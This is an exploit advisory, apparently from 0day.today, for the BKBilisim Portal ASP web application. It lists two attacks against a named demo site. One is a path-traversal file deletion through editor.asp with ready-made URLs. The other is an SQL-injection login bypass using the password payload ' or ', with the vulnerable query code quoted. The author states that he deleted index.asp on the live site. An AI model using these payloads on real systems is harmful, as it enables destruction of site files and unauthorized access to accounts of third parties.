BKBilisim Portal Multiple Vulnerability

=======================================
BKBilisim Portal Multiple Vulnerability
=======================================

# BKBilisim Portal Multiple Vulnerability
# Author ZoRLu
# mail-msn: [email protected]
# Home: z0rlu.blogspot.com
# Date: 07/09/2010
# Demo: http://www.bio-zeytolive.com
# Scrp: http://www.aspindir.com/Goster/5531
# Tesekkur: inj3ct0r.com, r0073r, Dr.Ly0n, LifeSteaLeR, Heart_Hunter, Cyber-Zone, Stack, AlpHaNiX, ThE g0bL!N and all Friends
# Temenni: Hayirli Bayramlar


1. Arbitrary File Delete

target: http://www.bio-zeytolive.com / i deleted index.asp

vuln. file:

/fiyat/editor.asp

example:

you look first here:

http://www.bio-zeytolive.com/upload.asp

after go here:

http://www.bio-zeytolive.com/fiyat/editor.asp?mode=delete&file=../upload.asp

more after go here:

http://www.bio-zeytolive.com/upload.asp

and you will see file is delete 

or 

you look fisrt here:

http://www.bio-zeytolive.com/kategoriadmin/kategori_sil.asp

after you go here:

http://www.bio-zeytolive.com/fiyat/editor.asp?mode=delete&file=../kategoriadmin/kategori_sil.asp

more after you go here:

http://www.bio-zeytolive.com/kategoriadmin/kategori_sil.asp  

and you will see file is delete

you can do this, for any file

2. Bypass

Vuln. file:

giris.asp

//

kullanici	= Request.Form("kullanici")  //line 4
parola	= Request.Form("parola")         //line 5

sql="Select * From uyeler where onay=1 and kullanici = '"& kullanici &"' and parola = '" &parola&"' " //line 13

//

you go here:

http://www.bio-zeytolive.com/uye.asp

kullanici adi: zrl or write anything

parola: ' or '

you will be login



#  0day.today [2018-04-10]  #